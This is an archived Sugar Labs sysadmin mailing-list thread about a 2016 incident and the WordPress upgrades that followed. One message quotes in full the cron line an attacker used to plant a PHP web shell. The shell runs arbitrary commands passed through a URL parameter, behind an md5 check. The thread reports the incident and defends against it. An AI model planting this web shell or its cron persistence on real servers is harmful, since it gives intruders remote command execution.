[Systems] Found a backdoor

Samuel Cantero scanterog at gmail.com
Sun Mar 6 20:02:55 EST 2016


Hi Walter,

I have updated the WP version on your site to the last one (4.4.2). I also
uploaded the last version of the akismet plugin to the wp plugin folder. In
theory, you should activate it through the wp admin interface in order to
make it work again. If you find something broken just let me know.

Best regards,

Samuel C.

On Tue, Mar 1, 2016 at 10:55 PM, Samuel Cantero <scanterog at gmail.com> wrote:

> If you want to keep it and I can do the job. I will try to do it this
> weekend.
>
> Best regards,
>
> Samuel C.
>
> On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
> wrote:
>
>> Let's shut it down for the time being. I've been updating the wiki but
>> not my blog since the attack last year anyway.
>>
>> -walter
>>
>> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
>> wrote:
>>
>>> +walter
>>>
>>> Can we appoint an official maintainer for walterbender.org? Sorry for
>>> not stepping up myself, but I'm overwhelmed by work related things and
>>> trying to reduce my sysadmin load.
>>>
>>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>>> > <mailto:bernie at codewiz.org>> wrote:
>>> >
>>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>>> >     > Remember in June we had an incident with a broken Wordpress site.
>>> >     > I switched to static generator since then.
>>> >     >
>>> >     > +1 on containers just learning more about them and finding them
>>> fascinating.
>>> >     > Count me in on containerizing everything.
>>> >     >
>>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>>> >     > Wordpress is a PIA IMHO.
>>> >
>>> >     Yes, WP is riddled with security holes. Back in October, Samuel
>>> helped
>>> >     Walter upgrade walterbender.org <http://walterbender.org> on
>>> >     sunjammer. Samuel, can you confirm
>>> >     that the WP instance now fully patched and locked down?
>>> >
>>> >
>>> > The WP version on walterbender.org <http://walterbender.org> site is
>>> > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
>>> > and we can find this:
>>> >
>>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a
>>> cross-site
>>> > scripting vulnerability that could allow a site to be compromised.
>>> >
>>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>>> > security issues: a possible SSRF for certain local URIs, and an open
>>> > redirection attack.
>>> >
>>> > This site also uses the 2.5.9 akismet plugin. The last version is
>>> 3.1.7.
>>> > Significant information on the release notes:
>>> >
>>> >   * Pre-emptive security improvements to ensure that the Akismet plugin
>>> >     can't be used by attackers to compromise a WordPress installation.
>>> >   * Closes a potential XSS vulnerability.
>>> >
>>> > Of course, every version has a lot of bug fixes. We definitely should
>>> > upgrade it and test nothing breaks walterbender.org
>>> > <http://walterbender.org> site.
>>> >
>>> > Who is in charge of upgrading the others WP sites?
>>> >
>>> > Regards,
>>> >
>>> > Samuel C.
>>> >
>>> >
>>> >
>>> >
>>> >     > Regards,
>>> >     > Sebastian
>>> >     >
>>> >     >
>>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i
>>> >     found
>>> >     >> that www-data was executing commands like these:
>>> >     >>
>>> >     >> */27 * * * * echo '<?php if
>>> (substr(md5($_GET["localdate"]),0,6) ==
>>> >     >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>>> >     >> @system($time); exit; } ?>' >
>>> /srv/www-somosazucar/blog/.cache.php
>>> >     >>
>>> >     >> Did you spot the system()? This executes arbitrary commands
>>> specified
>>> >     >> via the "localtime" url parameter. Uh-oh.
>>> >     >>
>>> >     >> There were about a dozen lines like the above, installing
>>> >     .cache.php in
>>> >     >> various virtualhosts. I kept a copy of the file in
>>> >     >> /root/www-data.backdoor. The file was last written on Jun 23
>>> 2015,
>>> >     >> which may correlate with the switch to the new website.
>>> >     >>
>>> >     >> I cleared the mess and searched the logs for requests containing
>>> >     >> "localtime", but couldn't find any. I wonder if they could
>>> filter the
>>> >     >> logs, since they were previously writable by www-data.
>>> >     >>
>>> >     >> Please watch out. We should ensure directories accessible over
>>> >     http are
>>> >     >> not writable by user www-data, especially those in which PHP
>>> and CGIs
>>> >     >> are enabled.
>>> >     >>
>>> >     >> Running several large sites under the same uid has always been
>>> a bad
>>> >     >> security practice, and looking forward we should keep migrating
>>> >     them to
>>> >     >> properly isolated containers.
>>> >     >>
>>> >     >> Finally, Wordpress is particularly dangerous and we should
>>> update and
>>> >     >> harden all instances. Can someone please take care of this?
>>> I'll do
>>> >     >> Mediawiki, which I know pretty well.
>>> >     >>
>>> >     >
>>> >
>>> >
>>> >     --
>>> >      _ // Bernie Innocenti
>>> >      \X/  http://codewiz.org
>>> >     _______________________________________________
>>> >     Systems mailing list
>>> >     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>>> >     http://lists.sugarlabs.org/listinfo/systems
>>> >
>>> >
>>> >
>>> >
>>> > _______________________________________________
>>> > Systems mailing list
>>> > Systems at lists.sugarlabs.org
>>> > http://lists.sugarlabs.org/listinfo/systems
>>> >
>>>
>>>
>>> --
>>>  _ // Bernie Innocenti
>>>  \X/  http://codewiz.org
>>>
>>
>>
>>
>> --
>> Walter Bender
>> Sugar Labs
>> http://www.sugarlabs.org
>> <http://www.sugarlabs.org>
>>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160306/2b420685/attachment.html>


More information about the Systems mailing list